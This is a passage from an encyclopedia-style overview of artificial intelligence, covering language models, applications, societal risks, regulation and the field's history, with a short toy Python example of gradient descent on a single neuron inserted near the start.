1950s) i but because of two factors: the incredible increase in computer power (including the hundred-fold increase in speed by switching to GPUs) and the availability of vast amounts of training data, especially the giant curated datasets used for benchmark testing, such as ImageNet. 
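As a toy illustration of the training idea described above (local search over weights via gradient descent on a single artificial neuron), here is a hedged sketch on an invented dataset; it does not represent any particular framework's API:

# Gradient descent on a single sigmoid neuron: repeatedly nudge the weights in
# the direction that reduces the prediction error on a tiny toy dataset (AND).
import math

data = [((0.0, 0.0), 0), ((0.0, 1.0), 0), ((1.0, 0.0), 0), ((1.0, 1.0), 1)]
w = [0.0, 0.0]
b = 0.0
lr = 0.5  # learning rate

for _ in range(2000):
    for (x1, x2), target in data:
        z = w[0] * x1 + w[1] * x2 + b
        pred = 1.0 / (1.0 + math.exp(-z))  # sigmoid activation
        error = pred - target              # derivative of cross-entropy loss w.r.t. z
        w[0] -= lr * error * x1            # step each weight downhill
        w[1] -= lr * error * x2
        b -= lr * error

for (x1, x2), target in data:
    z = w[0] * x1 + w[1] * x2 + b
    print((x1, x2), target, round(1.0 / (1.0 + math.exp(-z)), 3))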
j Generative pre-trained transformers (GPT) are large language models (LLMs) that generate text based on the semantic relationships between words in sentences. Text-based GPT models are pretrained on a large corpus of text that can be from the Internet. The pretraining consists of predicting the next token (a token being usually a word, subword, or punctuation). Throughout this pretraining, GPT models accumulate knowledge about the world and can then generate human-like text by repeatedly predicting the next token. Typically, a subsequent training phase makes the model more truthful, useful, and harmless, usually with a technique called reinforcement learning from human feedback (RLHF). Current GPT models are prone to generating falsehoods called "hallucinations", although this can be reduced with RLHF and quality data. They are used in chatbots, which allow people to ask a question or request a task in simple text. 126 127 Current models and services include Gemini (formerly Bard), ChatGPT, Grok, Claude, Copilot, and LLaMA. 128 Multimodal GPT models can process different types of data (modalities) such as images, videos, sound, and text. 129 In the late 2010s, graphics processing units (GPUs) that were increasingly designed with AI-specific enhancements and used with specialized TensorFlow software had replaced previously used central processing unit (CPUs) as the dominant means for large-scale (commercial and academic) machine learning models' training. 130 Specialized programming languages such as Prolog were used in early AI research, 131 but general-purpose programming languages like Python have become predominant. 132 AI and machine learning technology is used in most of the essential applications of the 2020s, including: search engines (such as Google Search), targeting online advertisements, recommendation systems (offered by Netflix, YouTube or Amazon), driving internet traffic, targeted advertising (AdSense, Facebook), virtual assistants (such as Siri or Alexa), autonomous vehicles (including drones, ADAS and self-driving cars), automatic language translation (Microsoft Translator, Google Translate), facial recognition (Apple's Face ID or Microsoft's DeepFace and Google's FaceNet) and image labeling (used by Facebook, Apple's iPhoto and TikTok). The deployment of AI may be overseen by a Chief automation officer (CAO). The application of AI in medicine and medical research has the potential to increase patient care and quality of life. 133 Through the lens of the Hippocratic Oath, medical professionals are ethically compelled to use AI, if applications can more accurately diagnose and treat patients. For medical research, AI is an important tool for processing and integrating big data. This is particularly important for organoid and tissue engineering development which use microscopy imaging as a key technique in fabrication. 134 It has been suggested that AI can overcome discrepancies in funding allocated to different fields of research. 134 New AI tools can deepen the understanding of biomedically relevant pathways. For example, AlphaFold 2 (2021) demonstrated the ability to approximate, in hours rather than months, the 3D structure of a protein. 135 In 2023, it was reported that AI-guided drug discovery helped find a class of antibiotics capable of killing two different types of drug-resistant bacteria. 136 In 2024, researchers used machine learning to accelerate the search for Parkinson's disease drug treatments. 
Their aim was to identify compounds that block the clumping, or aggregation, of alpha-synuclein (the protein that characterises Parkinson's disease). They were able to speed up the initial screening process ten-fold and reduce the cost by a thousand-fold. 137 138 Game playing programs have been used since the 1950s to demonstrate and test AI's most advanced techniques. 139 Deep Blue became the first computer chess-playing system to beat a reigning world chess champion, Garry Kasparov, on 11 May 1997. 140 In 2011, in a Jeopardy quiz show exhibition match, IBM's question answering system, Watson, defeated the two greatest Jeopardy champions, Brad Rutter and Ken Jennings, by a significant margin. 141 In March 2016, AlphaGo won 4 out of 5 games of Go in a match with Go champion Lee Sedol, becoming the first computer Go-playing system to beat a professional Go player without handicaps. Then in 2017 it defeated Ke Jie, who was the best Go player in the world. 142 Other programs handle imperfect-information games, such as the poker-playing program Pluribus. 143 DeepMind developed increasingly generalistic reinforcement learning models, such as with MuZero, which could be trained to play chess, Go, or Atari games. 144 In 2019, DeepMind's AlphaStar achieved grandmaster level in StarCraft II, a particularly challenging real-time strategy game that involves incomplete knowledge of what happens on the map. 145 In 2021, an AI agent competed in a PlayStation Gran Turismo competition, winning against four of the world's best Gran Turismo drivers using deep reinforcement learning. 146 In 2024, Google DeepMind introduced SIMA, a type of AI capable of autonomously playing nine previously unseen open-world video games by observing screen output, as well as executing short, specific tasks in response to natural language instructions. 147 In mathematics, special forms of formal step-by-step reasoning are used. In contrast, LLMs such as GPT 4 Turbo, Gemini Ultra, Claude Opus, LLaMa 2 or Mistral Large are working with probabilistic models, which can produce wrong answers in the form of hallucinations. Therefore, they need not only a large database of mathematical problems to learn from but also methods such as supervised fine-tuning or trained classifiers with human-annotated data to improve answers for new problems and learn from corrections. 148 A 2024 study showed that the performance of some language models for reasoning capabilities in solving math problems not included in their training data was low, even for problems with only minor deviations from trained data. 149 Alternatively, dedicated models for mathematic problem solving with higher precision for the outcome including proof of theorems have been developed such as Alpha Tensor, Alpha Geometry and Alpha Proof all from Google DeepMind, 150 Llemma from eleuther 151 or Julius. 152 When natural language is used to describe mathematical problems, converters transform such prompts into a formal language such as Lean to define mathematic tasks. Some models have been developed to solve challenging problems and reach good results in benchmark tests, others to serve as educational tools in mathematics. 153 Finance is one of the fastest growing sectors where applied AI tools are being deployed: from retail online banking to investment advice and insurance, where automated "robot advisers" have been in use for some years. 
154 World Pensions experts like Nicolas Firzli insist it may be too early to see the emergence of highly innovative AI-informed financial products and services: "the deployment of AI tools will simply further automatise things: destroying tens of thousands of jobs in banking, financial planning, and pension advice in the process, but I’m not sure it will unleash a new wave of e.g., sophisticated pension innovation. 155 Various countries are deploying AI military applications. 156 The main applications enhance command and control, communications, sensors, integration and interoperability. 157 Research is targeting intelligence collection and analysis, logistics, cyber operations, information operations, and semiautonomous and autonomous vehicles. 156 AI technologies enable coordination of sensors and effectors, threat detection and identification, marking of enemy positions, target acquisition, coordination and deconfliction of distributed Joint Fires between networked combat vehicles involving manned and unmanned teams. 157 AI was incorporated into military operations in Iraq and Syria. 156 In November 2023, US Vice President Kamala Harris disclosed a declaration signed by 31 nations to set guardrails for the military use of AI. The commitments include using legal reviews to ensure the compliance of military AI with international laws, and being cautious and transparent in the development of this technology. 158 In the early 2020s, generative AI gained widespread prominence. In March 2023, 58% of U.S. adults had heard about ChatGPT and 14% had tried it. 159 The increasing realism and ease-of-use of AI-based text-to-image generators such as Midjourney, DALL-E, and Stable Diffusion sparked a trend of viral AI-generated photos. Widespread attention was gained by a fake photo of Pope Francis wearing a white puffer coat, the fictional arrest of Donald Trump, and a hoax of an attack on the Pentagon, as well as the usage in professional creative arts. 160 161 Artificial intelligent (AI) agents are software entities designed to perceive their environment, make decisions, and take actions autonomously to achieve specific goals. These agents can interact with users, their environment, or other agents. AI agents are used in various applications, including virtual assistants, chatbots, autonomous vehicles, game-playing systems, and industrial robotics. AI agents operate within the constraints of their programming, available computational resources, and hardware limitations. This means they are restricted to performing tasks within their defined scope and have finite memory and processing capabilities. In real-world applications, AI agents often face time constraints for decision-making and action execution. Many AI agents incorporate learning algorithms, enabling them to improve their performance over time through experience or training. Using machine learning, AI agents can adapt to new situations and optimise their behaviour for their designated tasks. 162 163 164 There are also thousands of successful AI applications used to solve specific problems for specific industries or institutions. In a 2017 survey, one in five companies reported having incorporated "AI" in some offerings or processes. 165 A few examples are energy storage, medical diagnosis, military logistics, applications that predict the result of judicial decisions, foreign policy, or supply chain management. AI applications for evacuation and disaster management are growing. 
AI has been used to investigate if and how people evacuated in large scale and small scale evacuations using historical data from GPS, videos or social media. Further, AI can provide real time information on the real time evacuation conditions. 166 167 168 In agriculture, AI has helped farmers identify areas that need irrigation, fertilization, pesticide treatments or increasing yield. Agronomists use AI to conduct research and development. AI has been used to predict the ripening time for crops such as tomatoes, monitor soil moisture, operate agricultural robots, conduct predictive analytics, classify livestock pig call emotions, automate greenhouses, detect diseases and pests, and save water. Artificial intelligence is used in astronomy to analyze increasing amounts of available data and applications, mainly for "classification, regression, clustering, forecasting, generation, discovery, and the development of new scientific insights" for example for discovering exoplanets, forecasting solar activity, and distinguishing between signals and instrumental effects in gravitational wave astronomy. It could also be used for activities in space such as space exploration, including analysis of data from space missions, real-time science decisions of spacecraft, space debris avoidance, and more autonomous operation. AI has potential benefits and potential risks. AI may be able to advance science and find solutions for serious problems: Demis Hassabis of Deep Mind hopes to "solve intelligence, and then use that to solve everything else". 169 However, as the use of AI has become widespread, several unintended consequences and risks have been identified. 170 In-production systems can sometimes not factor ethics and bias into their AI training processes, especially when the AI algorithms are inherently unexplainable in deep learning. 171 Machine learning algorithms require large amounts of data. The techniques used to acquire this data have raised concerns about privacy, surveillance and copyright. AI-powered devices and services, such as virtual assistants and IoT products, continuously collect personal information, raising concerns about intrusive data gathering and unauthorized access by third parties. The loss of privacy is further exacerbated by AI's ability to process and combine vast amounts of data, potentially leading to a surveillance society where individual activities are constantly monitored and analyzed without adequate safeguards or transparency. Sensitive user data collected may include online activity records, geolocation data, video or audio. 172 For example, in order to build speech recognition algorithms, Amazon has recorded millions of private conversations and allowed temporary workers to listen to and transcribe some of them. 173 Opinions about this widespread surveillance range from those who see it as a necessary evil to those for whom it is clearly unethical and a violation of the right to privacy. 174 AI developers argue that this is the only way to deliver valuable applications. and have developed several techniques that attempt to preserve privacy while still obtaining the data, such as data aggregation, de-identification and differential privacy. 175 Since 2016, some privacy experts, such as Cynthia Dwork, have begun to view privacy in terms of fairness. Brian Christian wrote that experts have pivoted "from the question of 'what they know' to the question of 'what they're doing with it'. 
176 Generative AI is often trained on unlicensed copyrighted works, including in domains such as images or computer code; the output is then used under the rationale of "fair use". Experts disagree about how well and under what circumstances this rationale will hold up in courts of law; relevant factors may include "the purpose and character of the use of the copyrighted work" and "the effect upon the potential market for the copyrighted work". 177 178 Website owners who do not wish to have their content scraped can indicate it in a "robots.txt" file. 179 In 2023, leading authors (including John Grisham and Jonathan Franzen) sued AI companies for using their work to train generative AI. 180 181 Another discussed approach is to envision a separate sui generis system of protection for creations generated by AI to ensure fair attribution and compensation for human authors. 182 The commercial AI scene is dominated by Big Tech companies such as Alphabet Inc., Amazon, Apple Inc., Meta Platforms, and Microsoft. 183 184 185 Some of these players already own the vast majority of existing cloud infrastructure and computing power from data centers, allowing them to entrench further in the marketplace. 186 187 In January 2024, the International Energy Agency (IEA) released Electricity 2024, Analysis and Forecast to 2026, forecasting electric power use. 188 This is the first IEA report to make projections for data centers and power consumption for artificial intelligence and cryptocurrency. The report states that power demand for these uses might double by 2026, with additional electric power usage equal to electricity used by the whole Japanese nation. 189 Prodigious power consumption by AI is responsible for the growth of fossil fuels use, and might delay closings of obsolete, carbon-emitting coal energy facilities. There is a feverish rise in the construction of data centers throughout the US, making large technology firms (e.g., Microsoft, Meta, Google, Amazon) into voracious consumers of electric power. Projected electric consumption is so immense that there is concern that it will be fulfilled no matter the source. A ChatGPT search involves the use of 10 times the electrical energy as a Google search. The large firms are in haste to find power sources from nuclear energy to geothermal to fusion. The tech firms argue that in the long view AI will be eventually kinder to the environment, but they need the energy now. AI makes the power grid more efficient and "intelligent", will assist in the growth of nuclear power, and track overall carbon emissions, according to technology firms. 190 A 2024 Goldman Sachs Research Paper, AI Data Centers and the Coming US Power Demand Surge, found "US power demand (is) likely to experience growth not seen in a generation…. and forecasts that, by 2030, US data centers will consume 8% of US power, as opposed to 3% in 2022, presaging growth for the electrical power generation industry by a variety of means. 191 Data centers' need for more and more electrical power is such that they might max out the electrical grid. The Big Tech companies counter that AI can be used to maximize the utilization of the grid by all. 192 In 2024, the Wall Street Journal reported that big AI companies have begun negotiations with the US nuclear power providers to provide electricity to the data centers. In March 2024 Amazon purchased a Pennsylvania nuclear-powered data center for $650 Million (US). 193 YouTube, Facebook and others use recommender systems to guide users to more content. 
These AI programs were given the goal of maximizing user engagement (that is, the only goal was to keep people watching). The AI learned that users tended to choose misinformation, conspiracy theories, and extreme partisan content, and, to keep them watching, the AI recommended more of it. Users also tended to watch more content on the same subject, so the AI led people into filter bubbles where they received multiple versions of the same misinformation. 194 This convinced many users that the misinformation was true, and ultimately undermined trust in institutions, the media and the government. 195 The AI program had correctly learned to maximize its goal, but the result was harmful to society. After the U.S. election in 2016, major technology companies took steps to mitigate the problem citation needed . In 2022, generative AI began to create images, audio, video and text that are indistinguishable from real photographs, recordings, films, or human writing. It is possible for bad actors to use this technology to create massive amounts of misinformation or propaganda. 196 AI pioneer Geoffrey Hinton expressed concern about AI enabling "authoritarian leaders to manipulate their electorates" on a large scale, among other risks. 197 In statistics, a bias is a systematic error or deviation from the correct value. But in the context of fairness, it often refers to a tendency in favor or against a certain group or individual characteristic, usually in a way that is considered unfair or harmful. A statistically unbiased AI system that produces disparate outcomes for different demographic groups may thus be viewed as biased in the ethical sense. 198 The field of fairness studies how to prevent harms from algorithmic biases. There are various conflicting definitions and mathematical models of fairness. These notions depend on ethical assumptions, and are influenced by beliefs about society. One broad category is distributive fairness, which focuses on the outcomes, often identifying groups and seeking to compensate for statistical disparities. Representational fairness tries to ensure that AI systems don't reinforce negative stereotypes or render certain groups invisible. Procedural fairness focuses on the decision process rather than the outcome. The most relevant notions of fairness may depend on the context, notably the type of AI application and the stakeholders. The subjectivity in the notions of bias and fairness makes it difficult for companies to operationalize them. Having access to sensitive attributes such as race or gender is also considered by many AI ethicists to be necessary in order to compensate for biases, but it may conflict with anti-discrimination laws. 198 Machine learning applications will be biased if they learn from biased data. 199 The developers may not be aware that the bias exists. 200 Bias can be introduced by the way training data is selected and by the way a model is deployed. 201 199 If a biased algorithm is used to make decisions that can seriously harm people (as it can in medicine, finance, recruitment, housing or policing) then the algorithm may cause discrimination. 202 On June 28, 2015, Google Photos's new image labeling feature mistakenly identified Jacky Alcine and a friend as "gorillas" because they were black. The system was trained on a dataset that contained very few images of black people, 203 a problem called "sample size disparity". 204 Google "fixed" this problem by preventing the system from labelling anything as a "gorilla". 
Eight years later, in 2023, Google Photos still could not identify a gorilla, and neither could similar products from Apple, Facebook, Microsoft and Amazon. 205 COMPAS is a commercial program widely used by U.S. courts to assess the likelihood of a defendant becoming a recidivist. In 2016, Julia Angwin at ProPublica discovered that COMPAS exhibited racial bias, despite the fact that the program was not told the races of the defendants. Although the error rate for both whites and blacks was calibrated equal at exactly 61%, the errors for each race were different—the system consistently overestimated the chance that a black person would re-offend and underestimated the chance that a white person would re-offend. 206 In 2017, several researchers showed that it was mathematically impossible for COMPAS to accommodate all possible measures of fairness when the base rates of re-offense were different for whites and blacks in the data. 208 A program can make biased decisions even if the data does not explicitly mention a problematic feature (such as "race" or "gender"). The feature will correlate with other features (like "address", "shopping history" or "first name"), and the program will make the same decisions based on these features as it would on "race" or "gender". 209 Moritz Hardt said "the most robust fact in this research area is that fairness through blindness doesn't work." 210 Criticism of COMPAS highlighted that machine learning models are designed to make "predictions" that are only valid if we assume that the future will resemble the past. If they are trained on data that includes the results of racist decisions in the past, machine learning models must predict that racist decisions will be made in the future. If an application then uses these predictions as recommendations, some of these "recommendations" will likely be racist. 211 Thus, machine learning is not well suited to help make decisions in areas where there is hope that the future will be better than the past. It is descriptive rather than prescriptive. Bias and unfairness may go undetected because the developers are overwhelmingly white and male: among AI engineers, about 4% are black and 20% are women. 204 At its 2022 Conference on Fairness, Accountability, and Transparency (ACM FAccT 2022), held in Seoul, South Korea, the Association for Computing Machinery presented and published findings recommending that, until AI and robotics systems are demonstrated to be free of bias mistakes, they be considered unsafe, and that the use of self-learning neural networks trained on vast, unregulated sources of flawed internet data should be curtailed. 213 Many AI systems are so complex that their designers cannot explain how they reach their decisions. 214 This is especially true of deep neural networks, in which there are a large number of non-linear relationships between inputs and outputs; nevertheless, some popular explainability techniques exist. 215 It is impossible to be certain that a program is operating correctly if no one knows exactly how it works. There have been many cases where a machine learning program passed rigorous tests, but nevertheless learned something different from what the programmers intended. For example, a system that could identify skin diseases better than medical professionals was found to have a strong tendency to classify images with a ruler as "cancerous", because pictures of malignancies typically include a ruler to show the scale. 
216 Another machine learning system designed to help effectively allocate medical resources was found to classify patients with asthma as being at "low risk" of dying from pneumonia. Having asthma is actually a severe risk factor, but since the patients having asthma would usually get much more medical care, they were relatively unlikely to die according to the training data. The correlation between asthma and low risk of dying from pneumonia was real, but misleading. 217 People who have been harmed by an algorithm's decision have a right to an explanation. 218 Doctors, for example, are expected to clearly and completely explain to their colleagues the reasoning behind any decision they make. Early drafts of the European Union's General Data Protection Regulation in 2016 included an explicit statement that this right exists. m Industry experts noted that this is an unsolved problem with no solution in sight. Regulators argued that nevertheless the harm is real: if the problem has no solution, the tools should not be used. 219 DARPA established the XAI ("Explainable Artificial Intelligence") program in 2014 to try and solve these problems. 220 Several approaches aim to address the transparency problem. SHAP enables to visualise the contribution of each feature to the output. 221 LIME can locally approximate a model's outputs with a simpler, interpretable model. 222 Multitask learning provides a large number of outputs in addition to the target classification. These other outputs can help developers deduce what the network has learned. 223 Deconvolution, DeepDream and other generative methods can allow developers to see what different layers of a deep network for computer vision have learned, and produce output that can suggest what the network is learning. 224 For generative pre-trained transformers, Anthropic developed a technique based on dictionary learning that associates patterns of neuron activations with human-understandable concepts. 225 Artificial intelligence provides a number of tools that are useful to bad actors, such as authoritarian governments, terrorists, criminals or rogue states. A lethal autonomous weapon is a machine that locates, selects and engages human targets without human supervision. n Widely available AI tools can be used by bad actors to develop inexpensive autonomous weapons and, if produced at scale, they are potentially weapons of mass destruction. 227 Even when used in conventional warfare, it is unlikely that they will be unable to reliably choose targets and could potentially kill an innocent person. 227 In 2014, 30 nations (including China) supported a ban on autonomous weapons under the United Nations' Convention on Certain Conventional Weapons, however the United States and others disagreed. 228 By 2015, over fifty countries were reported to be researching battlefield robots. 229 AI tools make it easier for authoritarian governments to efficiently control their citizens in several ways. Face and voice recognition allow widespread surveillance. Machine learning, operating this data, can classify potential enemies of the state and prevent them from hiding. Recommendation systems can precisely target propaganda and misinformation for maximum effect. Deepfakes and generative AI aid in producing misinformation. Advanced AI can make authoritarian centralized decision making more competitive than liberal and decentralized systems such as markets. It lowers the cost and difficulty of digital warfare and advanced spyware. 
230 All these technologies have been available since 2020 or earlier—AI facial recognition systems are already being used for mass surveillance in China. 231 232 There are many other ways that AI is expected to help bad actors, some of which cannot be foreseen. For example, machine-learning AI is able to design tens of thousands of toxic molecules in a matter of hours. 233 Economists have frequently highlighted the risks of redundancies from AI, and speculated about unemployment if there is no adequate social policy for full employment. 234 In the past, technology has tended to increase rather than reduce total employment, but economists acknowledge that "we're in uncharted territory" with AI. 235 A survey of economists showed disagreement about whether the increasing use of robots and AI will cause a substantial increase in long-term unemployment, but they generally agree that it could be a net benefit if productivity gains are redistributed. 236 Risk estimates vary; for example, in the 2010s, Michael Osborne and Carl Benedikt Frey estimated that 47% of U.S. jobs were at "high risk" of potential automation, while an OECD report classified only 9% of U.S. jobs as "high risk". 238 The methodology of speculating about future employment levels has been criticised as lacking evidential foundation, and for implying that technology, rather than social policy, creates unemployment, as opposed to redundancies. 234 In April 2023, it was reported that 70% of the jobs for Chinese video game illustrators had been eliminated by generative artificial intelligence. 239 240 Unlike previous waves of automation, many middle-class jobs may be eliminated by artificial intelligence; The Economist stated in 2015 that "the worry that AI could do to white-collar jobs what steam power did to blue-collar ones during the Industrial Revolution" is "worth taking seriously". 241 Jobs at extreme risk range from paralegals to fast food cooks, while job demand is likely to increase for care-related professions ranging from personal healthcare to the clergy. 242 From the early days of the development of artificial intelligence, there have been arguments, for example those put forward by Joseph Weizenbaum, about whether tasks that can be done by computers actually should be done by them, given the difference between computers and humans, and between quantitative calculation and qualitative, value-based judgement. 243 It has been argued that AI will become so powerful that humanity may irreversibly lose control of it. This could, as physicist Stephen Hawking stated, "spell the end of the human race". 244 This scenario has been common in science fiction, when a computer or robot suddenly develops a human-like "self-awareness" (or "sentience" or "consciousness") and becomes a malevolent character. These sci-fi scenarios are misleading in several ways. First, AI does not require human-like "sentience" to be an existential risk. Modern AI programs are given specific goals and use learning and intelligence to achieve them. Philosopher Nick Bostrom argued that if one gives almost any goal to a sufficiently powerful AI, it may choose to destroy humanity to achieve it (he used the example of a paperclip factory manager). 246 Stuart Russell gives the example of a household robot that tries to find a way to kill its owner to prevent it from being unplugged, reasoning that "you can't fetch the coffee if you're dead." 
247 In order to be safe for humanity, a superintelligence would have to be genuinely aligned with humanity's morality and values so that it is "fundamentally on our side". 248 Second, Yuval Noah Harari argues that AI does not require a robot body or physical control to pose an existential risk. The essential parts of civilization are not physical. Things like ideologies, law, government, money and the economy are made of language; they exist because there are stories that billions of people believe. The current prevalence of misinformation suggests that an AI could use language to convince people to believe anything, even to take actions that are destructive. 249 The opinions amongst experts and industry insiders are mixed, with sizable fractions both concerned and unconcerned by risk from eventual superintelligent AI. 250 Personalities such as Stephen Hawking, Bill Gates, and Elon Musk, 251 as well as AI pioneers such as Yoshua Bengio, Stuart Russell, Demis Hassabis, and Sam Altman, have expressed concerns about existential risk from AI. In May 2023, Geoffrey Hinton announced his resignation from Google in order to be able to "freely speak out about the risks of AI" without "considering how this impacts Google. 252 He notably mentioned risks of an AI takeover, 253 and stressed that in order to avoid the worst outcomes, establishing safety guidelines will require cooperation among those competing in use of AI. 254 In 2023, many leading AI experts issued the joint statement that "Mitigating the risk of extinction from AI should be a global priority alongside other societal-scale risks such as pandemics and nuclear war". 255 Other researchers, however, spoke in favor of a less dystopian view. AI pioneer Juergen Schmidhuber did not sign the joint statement, emphasising that in 95% of all cases, AI research is about making "human lives longer and healthier and easier. 256 While the tools that are now being used to improve lives can also be used by bad actors, "they can also be used against the bad actors. 257 258 Andrew Ng also argued that "it's a mistake to fall for the doomsday hype on AI—and that regulators who do will only benefit vested interests. 259 Yann LeCun "scoffs at his peers' dystopian scenarios of supercharged misinformation and even, eventually, human extinction. 260 In the early 2010s, experts argued that the risks are too distant in the future to warrant research or that humans will be valuable from the perspective of a superintelligent machine. 261 However, after 2016, the study of current and future risks and possible solutions became a serious area of research. 262 Friendly AI are machines that have been designed from the beginning to minimize risks and to make choices that benefit humans. Eliezer Yudkowsky, who coined the term, argues that developing friendly AI should be a higher research priority: it may require a large investment and it must be completed before AI becomes an existential risk. 263 Machines with intelligence have the potential to use their intelligence to make ethical decisions. The field of machine ethics provides machines with ethical principles and procedures for resolving ethical dilemmas. 264 The field of machine ethics is also called computational morality, 264 and was founded at an AAAI symposium in 2005. 265 Other approaches include Wendell Wallach's "artificial moral agents" 266 and Stuart J. Russell's three principles for developing provably beneficial machines. 
267 Active organizations in the AI open-source community include Hugging Face, 268 Google, 269 EleutherAI and Meta. 270 Various AI models, such as Llama 2, Mistral or Stable Diffusion, have been made open-weight, 271 272 meaning that their architecture and trained parameters (the "weights") are publicly available. Open-weight models can be freely fine-tuned, which allows companies to specialize them with their own data and for their own use-case. 273 Open-weight models are useful for research and innovation but can also be misused. Since they can be fine-tuned, any built-in security measure, such as objecting to harmful requests, can be trained away until it becomes ineffective. Some researchers warn that future AI models may develop dangerous capabilities (such as the potential to drastically facilitate bioterrorism) and that once released on the Internet, they can't be deleted everywhere if needed. They recommend pre-release audits and cost-benefit analyses. 274 Artificial Intelligence projects can have their ethical permissibility tested while designing, developing, and implementing an AI system. An AI framework such as the Care and Act Framework containing the SUM values—developed by the Alan Turing Institute tests projects in four main areas: 275 276 Other developments in ethical frameworks include those decided upon during the Asilomar Conference, the Montreal Declaration for Responsible AI, and the IEEE's Ethics of Autonomous Systems initiative, among others; 277 however, these principles do not go without their criticisms, especially regards to the people chosen contributes to these frameworks. 278 Promotion of the wellbeing of the people and communities that these technologies affect requires consideration of the social and ethical implications at all stages of AI system design, development and implementation, and collaboration between job roles such as data scientists, product managers, data engineers, domain experts, and delivery managers. 279 The UK AI Safety Institute released in 2024 a testing toolset called 'Inspect' for AI safety evaluations available under a MIT open-source licence which is freely available on GitHub and can be improved with third-party packages. It can be used to evaluate AI models in a range of areas including core knowledge, ability to reason, and autonomous capabilities. 280 The regulation of artificial intelligence is the development of public sector policies and laws for promoting and regulating AI; it is therefore related to the broader regulation of algorithms. 281 The regulatory and policy landscape for AI is an emerging issue in jurisdictions globally. 282 According to AI Index at Stanford, the annual number of AI-related laws passed in the 127 survey countries jumped from one passed in 2016 to 37 passed in 2022 alone. 283 284 Between 2016 and 2020, more than 30 countries adopted dedicated strategies for AI. 285 Most EU member states had released national AI strategies, as had Canada, China, India, Japan, Mauritius, the Russian Federation, Saudi Arabia, United Arab Emirates, U.S., and Vietnam. Others were in the process of elaborating their own AI strategy, including Bangladesh, Malaysia and Tunisia. 285 The Global Partnership on Artificial Intelligence was launched in June 2020, stating a need for AI to be developed in accordance with human rights and democratic values, to ensure public confidence and trust in the technology. 
285 Henry Kissinger, Eric Schmidt, and Daniel Huttenlocher published a joint statement in November 2021 calling for a government commission to regulate AI. 286 In 2023, OpenAI leaders published recommendations for the governance of superintelligence, which they believe may happen in less than 10 years. 287 In 2023, the United Nations also launched an advisory body to provide recommendations on AI governance; the body comprises technology company executives, governments officials and academics. 288 In a 2022 Ipsos survey, attitudes towards AI varied greatly by country; 78% of Chinese citizens, but only 35% of Americans, agreed that "products and services using AI have more benefits than drawbacks". 283 A 2023 Reuters Ipsos poll found that 61% of Americans agree, and 22% disagree, that AI poses risks to humanity. 289 In a 2023 Fox News poll, 35% of Americans thought it "very important", and an additional 41% thought it "somewhat important", for the federal government to regulate AI, versus 13% responding "not very important" and 8% responding "not at all important". 290 291 In November 2023, the first global AI Safety Summit was held in Bletchley Park in the UK to discuss the near and far term risks of AI and the possibility of mandatory and voluntary regulatory frameworks. 292 28 countries including the United States, China, and the European Union issued a declaration at the start of the summit, calling for international co-operation to manage the challenges and risks of artificial intelligence. 293 294 In May 2024 at the AI Seoul Summit, 16 global AI tech companies agreed to safety commitments on the development of AI. 295 296 The study of mechanical or "formal" reasoning began with philosophers and mathematicians in antiquity. The study of logic led directly to Alan Turing's theory of computation, which suggested that a machine, by shuffling symbols as simple as "0" and "1", could simulate any conceivable form of mathematical reasoning. 297 4 This, along with concurrent discoveries in cybernetics, information theory and neurobiology, led researchers to consider the possibility of building an "electronic brain". q They developed several areas of research that would become part of AI, 299 such as McCullouch and Pitts design for "artificial neurons" in 1943, 119 and Turing's influential 1950 paper 'Computing Machinery and Intelligence', which introduced the Turing test and showed that "machine intelligence" was plausible. 300 4 The field of AI research was founded at a workshop at Dartmouth College in 1956. r 5 The attendees became the leaders of AI research in the 1960s. s They and their students produced programs that the press described as "astonishing": t computers were learning checkers strategies, solving word problems in algebra, proving logical theorems and speaking English. u 8 Artificial intelligence laboratories were set up at a number of British and U.S. universities in the latter 1950s and early 1960s. 4 Researchers in the 1960s and the 1970s were convinced that their methods would eventually succeed in creating a machine with general intelligence and considered this the goal of their field. 304 In 1965 Herbert Simon predicted, "machines will be capable, within twenty years, of doing any work a man can do". 305 In 1967 Marvin Minsky agreed, writing, "within a generation ... the problem of creating 'artificial intelligence' will substantially be solved". 306 They had, however, underestimated the difficulty of the problem. v In 1974, both the U.S. 
and British governments cut off exploratory research in response to the criticism of Sir James Lighthill 308 and ongoing pressure from the U.S. Congress to fund more productive projects. 309 Minsky's and Papert's book Perceptrons was understood as proving that artificial neural networks would never be useful for solving real-world tasks, thus discrediting the approach altogether. 310 The "AI winter", a period when obtaining funding for AI projects was difficult, followed. 10 In the early 1980s, AI research was revived by the commercial success of expert systems, 311 a form of AI program that simulated the knowledge and analytical skills of human experts. By 1985, the market for AI had reached over a billion dollars. At the same time, Japan's fifth generation computer project inspired the U.S. and British governments to restore funding for academic research. 9 However, beginning with the collapse of the Lisp Machine market in 1987, AI once again fell into disrepute, and a second, longer-lasting winter began. 11 Up to this point, most of AI's funding had gone to projects that used high-level symbols to represent mental objects like plans, goals, beliefs, and known facts. In the 1980s, some researchers began to doubt that this approach would be able to imitate all the processes of human cognition, especially perception, robotics, learning and pattern recognition, 312 and began to look into "sub-symbolic" approaches. 313 Rodney Brooks rejected "representation" in general and focussed directly on engineering machines that move and survive. w Judea Pearl, Lofti Zadeh and others developed methods that handled incomplete and uncertain information by making reasonable guesses rather than precise logic. 90 318 But the most important development was the revival of "connectionism", including neural network research, by Geoffrey Hinton and others. 319 In 1990, Yann LeCun successfully showed that convolutional neural networks can recognize handwritten digits, the first of many successful applications of neural networks. 320 AI gradually restored its reputation in the late 1990s and early 21st century by exploiting formal mathematical methods and by finding specific solutions to specific problems. This "narrow" and "formal" focus allowed researchers to produce verifiable results and collaborate with other fields (such as statistics, economics and mathematics). 321 By 2000, solutions developed by AI researchers were being widely used, although in the 1990s they were rarely described as "artificial intelligence". 322 However, several academic researchers became concerned that AI was no longer pursuing its original goal of creating versatile, fully intelligent machines. Beginning around 2002, they founded the subfield of artificial general intelligence (or "AGI"), which had several well-funded institutions by the 2010s. 15 Deep learning began to dominate industry benchmarks in 2012 and was adopted throughout the field. 12 For many specific tasks, other methods were abandoned. x Deep learning's success was based on both hardware improvements (faster computers, 324 graphics processing units, cloud computing 325 ) and access to large amounts of data 326 (including curated datasets, 325 such as ImageNet). Deep learning's success led to an enormous increase in interest and funding in AI. y The amount of machine learning research (measured by total publications) increased by 50% in the years 2015 2019. 
